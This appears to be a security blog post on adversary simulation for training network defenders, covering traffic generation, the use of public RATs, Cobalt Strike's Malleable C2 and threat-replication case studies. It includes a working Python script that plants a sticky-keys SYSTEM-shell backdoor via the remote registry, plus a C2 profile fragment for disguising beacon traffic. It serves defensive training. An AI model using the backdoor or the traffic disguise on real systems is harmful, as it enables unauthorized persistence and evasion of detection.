The organizations that buy security products and services are starting to see that compromise is inevitable. These organizations spend money on blinky boxes, people, services, and processes to deal with this situation. They need a way to know whether or not this investment is effective. Adversary simulation is a way to do this.

What is adversary simulation?

There’s no standard definition for adversary simulation, yet. It doesn’t even have an agreed-upon term. I’ve heard threat emulation, purple teaming, and attack simulation used to discuss roughly the same concept. I feel like several of us are wearing blindfolds, feeling around our immediate vicinity, and working to describe an elephant to each other.

From the discussions on this concept, I see a few common elements:

The goal of adversary simulation is to prepare network defense staff for the highly sophisticated targeted attacks their organization may face.

Adversary simulation assumes compromise. The access vector doesn’t matter as much as the post-compromise actions. This makes sense to me. If an adversary lives in your network for years, the 0-day used three years ago doesn’t really matter. Offensive techniques, like the Golden Ticket, turn long-term persistence on its head. An adversary may return to your network and resume complete control of your domain at any time. This is happening.

Adversary simulation is a white box activity, sometimes driven by a sequence of events or a story board. It is not the goal of an adversary simulation exercise to demonstrate a novel attack path. There are different ways to come up with this sequence of events. You could use a novel attack from a prior red team assessment or real-world intrusion. You could also host a meeting to discuss threat models and derive a plausible scenario from that.

There’s some understanding that adversary simulation involves meaningful network and host-based indicators. These are the observables a network defense team will use to detect and understand the attacker. The simulated indicators should allow the network defense team to exercise the same steps they would take if they had to respond to the real attacker. This requires creative adversary operators with an open mind about other ways to hack. These operators must learn the adversary’s tradecraft and cobble together something that resembles their process. They must pay attention to the protocols the adversary uses, the indicators in the communication, the tempo of the communication, and whether or not the actor relies on distributed infrastructure. Host-based indicators and persistence techniques matter too. The best training results will come from simulating these elements very closely.

Adversary simulation is inherently cooperative. Sometimes, the adversary operator executes the scenario with the network defense team present. Other times the operator debriefs after all of the actions are executed. In both cases, the adversary operators give up their indicators and techniques to allow the network defense team to learn from the experience and come up with ways to improve their process. This requirement places a great burden on an adversary simulation toolkit. The adversary operators need ways to execute the same scenario with new indicators or twists to measure improvement.

Hacking to get Caught – A Concept for Adversary Replication and Penetration Testing

Threat Models that Exercise your SIEM and Incident Response

Comprehensive Testing: Red and Blue Make Purple

Seeing Purple: Hybrid Security Teams for the Enterprise

Isn’t this the same as red teaming?

I see a simulated attack as different from a red team or full scope assessment. Red Team assessments exercise a mature security program in a comprehensive way. A skilled team conducts a real-world attack, stays in the network, and steals information. At the end, they reveal a (novel?) attack path and demonstrate risk. The red team’s report becomes a tool to inform decision makers about their security program and justify added resources or changes to the security program.

A useful full scope assessment requires ample time, and it is expensive.

Adversary simulation does not have to be expensive or elaborate. You can spend a day running through scenarios once each quarter. You can start simple and improve your approach as time goes on. This is an activity that is accessible to security programs with different levels of budget and maturity.

How does this relate to Cyber Defense Exercises?

I participate in a lot of Cyber Defense Exercises. Some events are set up as live-fire training against a credible simulated adversary. These exercises are driven by a narrative, and the red team executes the actions the narrative requires. The narrative drives the discussion post-action. All red team activities are white box, as the red team is not the training audience. These elements make cyber defense exercises very similar to adversary simulation as I’m describing it here. This is probably why this discussion perks up my ears; it’s familiar ground to me.

There are some differences though.

These exercises don’t happen in production networks. They happen in labs. This introduces a lot of artificiality. The participants don’t get to “train as they fight”, as many of the tools and sensors they use at home probably do not exist in the lab. There is also no element of surprise to help the attacker. Network defense teams come to these events ready to defend. These events usually involve multiple teams, which creates an element of competition. A safe adversary simulation, conducted on a production network, does not need to suffer from these drawbacks.

Why don’t we call it “Purple Teaming”?

Purple Teaming is a discussion about how red teams and blue teams can work together. Ideas about how to do this differ. I wouldn’t refer to Adversary Simulation as Purple Teaming. You could argue that Adversary Simulation is a form of Purple Teaming. It’s not the only form though. Some forms of purple teaming have a penetration tester sit with a network defense team and dissect penetration tester tradecraft. There are other ways to hack beyond the favored tricks and tools of penetration testers.

Let’s use lateral movement as an example:

A penetration tester might use Metasploit’s PsExec to demonstrate lateral movement, help a blue team zero in on this behavior, and call it a day. A red team member might drop to a shell and use native tools to demonstrate lateral movement, help a blue team understand these options, and move on.

An adversary operator tasked to replicate the recent behavior of a “nation-state affiliated” actor might load a Golden Ticket into their session and use that trust to remotely set up a sticky keys-like backdoor on targets and control them with RDP. This is a form of lateral movement, and it’s tied to an observed adversary tactic. The debrief in this case focuses on the novel tactic and potential strategies to detect and mitigate it.
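As a hedged illustration (every name here is hypothetical, and this is one possible implementation, not a prescription): the sticky keys-like backdoor can come down to a single Image File Execution Options value, set over the Remote Registry service with the admin rights the Golden Ticket provides. Five taps of Shift at the target’s login screen then spawn a SYSTEM shell reachable over RDP, with no malware on disk.

    # stickykeys.py - illustration only; Windows-only (winreg is in the stdlib)
    # Requires admin rights on the target and the RemoteRegistry service running.
    import winreg

    TARGET = r"\\TARGET-HOST"  # hypothetical machine, reached later via RDP
    IFEO = (r"SOFTWARE\Microsoft\Windows NT\CurrentVersion"
            r"\Image File Execution Options\sethc.exe")

    # attach to the remote machine's HKEY_LOCAL_MACHINE hive
    hive = winreg.ConnectRegistry(TARGET, winreg.HKEY_LOCAL_MACHINE)
    # point the sethc.exe "debugger" at cmd.exe: pressing Shift five times
    # at the login screen now launches a SYSTEM command prompt
    key = winreg.CreateKey(hive, IFEO)
    winreg.SetValueEx(key, "Debugger", 0, winreg.REG_SZ,
                      r"C:\Windows\System32\cmd.exe")
    winreg.CloseKey(key)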

Do you see the difference? A penetration tester or red team member will show something that works for them. An adversary operator will simulate a target adversary and help their customer understand and improve their posture against that adversary. Giving defenders exposure and training on tactics, techniques, and procedures beyond the typical penetration tester’s arsenal is one of the reasons adversary simulation is so important.

What are the best practices for Adversary Simulation?

Adversary Simulation is a developing area. There are several approaches and I’m sure others will emerge over time…

Traffic Generation

One way to simulate an adversary is to simulate their traffic on the wire. This is an opportunity to validate custom rules and to verify that sensors are firing. It’s a low-cost way to drill intrusion response and intrusion detection staff too. Fire off something obvious and wait to see how long it takes the team to detect it. If they don’t detect it, you immediately know you have a problem.
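A minimal sketch of the idea, assuming a test host you control and a made-up user-agent standing in for an indicator lifted from a threat report; the point is not the response, but whether anyone notices the request on the wire:

    # drill.py - fire an obvious indicator at infrastructure you own,
    # then time how long the SOC takes to flag it (values are placeholders)
    import urllib.request

    TEST_URL = "http://sensor-test.example.com/updates"   # hypothetical
    KNOWN_BAD_UA = "Mozilla/4.0 (compatible; MSIE 6.0; EvilRAT)"  # made up

    req = urllib.request.Request(TEST_URL, headers={"User-Agent": KNOWN_BAD_UA})
    try:
        urllib.request.urlopen(req, timeout=5)
    except OSError:
        pass  # the response doesn't matter; the wire traffic does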

Marcus Carey’s vSploit is an example of this approach. Keep an eye on his FireDrill.me company, as he’s expanding upon his original ideas as well.

DEF CON 19 – Metasploit vSploit Modules

Use Known Malware

Another approach is to use public malware on your customer’s network. Load up DarkComet, GhostRAT, or Bifrost and execute attacker-like actions. Of course, before you use this public malware, you have to audit it for backdoors and make sure you’re not introducing an adversary into your network. On the bright side, it’s free.

This approach is restrictive though. You’re limiting yourself to malware that you have a full toolchain for [the user interface, the C2 server, and the agent]. This is also the malware that off-the-shelf products will catch best. I like to joke that some anti-APT products catch 100% of APT, so long as you limit your definition of APT malware to Dark Comet.

This is probably a good approach with a new team, but as the network security monitoring team matures, you’ll need better capability to challenge them and keep their interest.

Use an Adversary Simulation Tool

Penetration Testing Tools are NOT adequate adversary simulation tools. Penetration Testing Tools usually have one post-exploitation agent with limited protocols and fixed communication options. If you use a penetration testing tool and give up its indicators, it’s burned after that. A lack of communication flexibility and options makes most penetration testing tools poor options for adversary simulation.

Cobalt Strike overcomes some of these problems. Cobalt Strike’s Beacon payload does bi-directional communication over named pipes (SMB), DNS TXT records, DNS A records, HTTP, and HTTPS. Beacon also gives you the flexibility to call home to multiple places and to vary the interval at which it calls home. This allows you to simulate an adversary that uses asynchronous bots and distributed infrastructure.

The above features make Beacon a better post-exploitation agent. They don’t address the adversary replication problem. One difference between a post-exploitation agent and an adversary replication tool is user-controlled indicators. Beacon’s Malleable C2 gives you this. Malleable C2 is a technology that lets you, the end user, change Beacon’s network indicators to look like something else. It takes two minutes to craft a profile that accurately mimics legitimate traffic or other malware. I took a lot of care to make this process as easy as possible.
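For a flavor of what this looks like, here is a minimal, illustrative profile fragment. The grammar is Cobalt Strike’s profile language; the URI, header, and encoding choices below are placeholders, not a real actor’s indicators:

    # minimal illustrative Malleable C2 fragment (placeholder values)
    set sleeptime "60000";

    http-get {
        set uri "/cm/updates";
        client {
            header "Host" "www.example.com";
            metadata {
                base64;
                prepend "session=";
                header "Cookie";
            }
        }
        server {
            output {
                base64;
                print;
            }
        }
    }

A fragment like this tells Beacon to encode its metadata into a Cookie header on the GET request and tells the team server how to wrap tasks in the response. Swap these values and the same payload presents entirely different network indicators.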

Malleable Command and Control

Cobalt Strike isn’t the only tool with this approach either. Encripto released Maligno, a Python agent that downloads shellcode and injects it into memory. This agent allows you to customize its network indicators to provide a trail for an intrusion analyst to follow.

Malleable C2 is a good start to support adversary simulation from a red team tool, but it’s not the whole picture. Adversary Simulation requires new storytelling tools and other types of customizable indicators, and it requires a rethink of workflows for lateral movement and post-exploitation. There’s a lot of work to do yet.

Putter Panda – Threat Replication Case Study

Will Adversary Simulation work?

I think so. I’d like to close this post with an observation, taken across various exercises:

In the beginning, it’s easy to challenge and exercise a network defense team. You will find that many network defenders do not have a lot of experience (actively) dealing with a sophisticated adversary. This is part of what allows these adversaries the freedom to live and work on so many networks. An inability to find these adversaries creates a sense of complacency. If I can’t see them, maybe they’re not there?

By exercising a network defense team and providing actionable feedback with useful details, you’re giving that team a way to understand their level. The teams that take the debrief seriously will figure out how to improve and get better.

Over time, you will find that these teams, spurred by your efforts, are operating at a level that will challenge your ability to create a meaningful experience for them. I’ve provided repeat red team support to many events since 2011. Each year I see the growth of the return teams that my friends and I provide an offensive service to. It’s rewarding work and we see the difference.

Heed my words though: the strongest network defense teams require a credible challenge to get better. Without adversary simulation tools [built or bought], you will quickly exhaust your ability to challenge these teams and keep up with their growth.

Puttering my Panda and other Threat Replication Case Studies

Cobalt Strike 2.0 introduced Malleable C2, a technology to redefine network indicators in the Beacon payload. What does this mean for you? It means you can closely emulate an actor and test intrusion response during a penetration test.

In this blog post, I’ll take you through three threat replication case studies with Cobalt Strike. In each case study, we will emulate the attacker’s method to get in, we will use a C2 profile that matches their malware, and we will analyze what this activity looks like in Snort and Wireshark.

Putter Panda

Putter Panda is an actor described in a June 2014 intelligence report from CrowdStrike. In this video, we replicate Putter Panda’s HTTP CLIENT malware and use a Document Dropper attack to deliver it.

String of Paerls

String of Paerls is an intrusion set described by Cisco’s VRT (formerly Sourcefire). In this video, we replicate the actor’s C2 with Beacon and use a macro embedded in a Word document to attack a target. We reproduce the attacker’s phish as well.

Energetic Bear / Crouching Yeti / Dragonfly

This actor, known by many names, allegedly targets the energy sector. The best information on this actor came from pastebin.com, without a slick PDF or PR team to back it up. In this video, we replicate this actor’s Havex trojan with Beacon and use a Java drive-by exploit to attack a target.

With the right technologies, threat replication isn’t hard. Read about and understand the actor’s tradecraft. Craft a profile that uses the actor’s indicators. Launch an attack and carry out your assessment. Threat Replication is a way to exercise intrusion response and see how well a security program stands up to these actors.